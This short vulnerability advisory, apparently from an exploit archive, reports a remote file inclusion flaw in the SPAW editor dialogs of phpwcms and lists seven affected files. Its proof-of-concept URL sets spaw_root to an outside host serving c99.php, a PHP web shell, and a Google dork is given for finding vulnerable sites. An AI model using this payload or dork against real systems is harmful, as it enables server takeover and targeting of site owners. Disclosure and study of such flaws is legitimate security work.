http://www.qmars.sub.ir
                                         qmarsfire@yahoo.com






=============================================================================================================================
Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://www.victim.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mormoroth.by.ru/c99.php?


Google Dork:     inurl:"phpwcms/index.php?id="
=============================================================================================================================      




                                        http://www.qmars.sub.ir
                                         qmarsfire@yahoo.com